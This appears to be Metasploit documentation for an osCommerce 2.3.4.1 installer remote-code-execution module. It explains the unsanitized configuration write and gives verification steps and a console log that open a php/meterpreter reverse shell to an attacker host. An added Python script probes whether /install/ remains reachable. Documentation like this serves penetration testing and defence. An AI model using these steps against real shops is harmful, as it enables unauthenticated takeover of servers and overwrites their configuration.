metasploit-gs/documentation/modules/exploit/multi/http/osCommerce.md
2018-04-06 11:32:20 +01:00

## Vulnerable Application

osCommerce 2.3.4.1 is vulnerable to unauthenticated remote code execution. If the `/install/` directory was not removed after the shop was set up, anyone can call the final installer step (install_4.php), which regenerates the shop's configuration file (`includes/configure.php`) from the values submitted with the request. Those values are written into the PHP configuration file without sanitization, so an attacker can break out of the generated define and inject arbitrary PHP, which runs the next time the configuration file is included. No credentials are required; the only precondition is a reachable `/install/` directory. Because the installer rewrites the live configuration, running the module against a production shop overwrites its database settings, so test against a copy where possible.

## Verification Steps

  1. Download and install osCommerce 2.3.4.1 (leave the `/install/` directory in place)
  2. `use exploit/multi/http/oscommerce_installer_unauth_code_exec`
  3. `set RHOST <target IP>`
  4. `set PAYLOAD php/meterpreter/reverse_tcp`
  5. `set LHOST <attacker IP>`
  6. `exploit`
  7. Verify that a new Meterpreter session is opened
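The module's only precondition is that the installer is still reachable, so it is worth confirming that before firing the exploit (or, on the defensive side, scanning your own shops for it). The script below is an added example written for this page; it is not part of the Metasploit module or of osCommerce. It probes the installer entry points shipped in the 2.3.x `/install/` directory (`install/index.php` and `install/install.php`; the path list is an assumption) and classifies each response. The body markers it looks for ("osCommerce" and "install") are likewise an assumption about what the installer pages render, and the sample responses at the bottom are constructed, not captured from a real host.

```python
"""Pre-flight check: is the osCommerce installer directory still reachable?"""
import sys
import urllib.error
import urllib.request

# Installer entry points as shipped in osCommerce 2.3.x (assumption).
# The exploit only works while /install/ exists, so this is the
# precondition we test for.
INSTALLER_PATHS = ("install/index.php", "install/install.php")

# Assumed body markers: the installer pages render an osCommerce-branded
# "install" wizard, so we require both words to call the page exposed.
MARKERS = ("oscommerce", "install")


def classify(status, body):
    """Classify one HTTP response to an installer path.

    'exposed'  - the installer is served (200 with the expected markers)
    'removed'  - the directory is gone (404/410)
    'blocked'  - reachable but access-controlled (401/403)
    'unknown'  - anything else (decoy pages, redirects, server errors)
    """
    if status in (404, 410):
        return "removed"
    if status in (401, 403):
        return "blocked"
    if status == 200:
        text = body.lower()
        if all(marker in text for marker in MARKERS):
            return "exposed"
    return "unknown"


def fetch(url, timeout=10):
    """Return (status, body) for url; HTTP error responses keep their status."""
    req = urllib.request.Request(
        url, headers={"User-Agent": "oscommerce-install-check"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read(65536).decode("utf-8", "replace")


def check_target(base_url, fetcher=fetch):
    """Probe each installer path under base_url; return {path: verdict}.

    `fetcher` is injectable so the logic can be exercised without a network.
    """
    base = base_url.rstrip("/") + "/"
    results = {}
    for path in INSTALLER_PATHS:
        try:
            status, body = fetcher(base + path)
        except (urllib.error.URLError, OSError) as err:
            results[path] = f"error: {err}"
            continue
        results[path] = classify(status, body)
    return results


def installer_exposed(results):
    """True if any installer path is served, i.e. the exploit precondition holds."""
    return any(verdict == "exposed" for verdict in results.values())


# Constructed sample responses (not captured from a real host) so the
# classifier can be exercised offline.
SAMPLE_RESPONSES = {
    "http://shop.example/install/index.php": (
        200,
        "<title>osCommerce Online Merchant</title><h1>Install</h1>",
    ),
    "http://shop.example/install/install.php": (404, "Not Found"),
}


def sample_fetch(url):
    return SAMPLE_RESPONSES[url]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        verdicts = check_target(sys.argv[1])
    else:
        verdicts = check_target("http://shop.example", sample_fetch)
    for path, verdict in verdicts.items():
        print(f"{path}: {verdict}")
    print("installer exposed:", installer_exposed(verdicts))
```

Run it as `python3 check_install.py http://172.16.40.188/` against a target; with no argument it runs over the constructed sample responses. A verdict of `exposed` on any path means the directory that the module depends on is still present; `removed` on all paths means the shop has been cleaned up and the module will not work.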

## Scenarios

### osCommerce version 2.3.4.1 on Debian

```
msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
RHOST => 172.16.40.188
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit

[*] Started reverse TCP handler on 172.16.40.5:4444
[*] Sending stage (37543 bytes) to 172.16.40.188
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100

meterpreter > sysinfo
Computer    : oscommerce
OS          : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
Meterpreter : php/linux
meterpreter >
```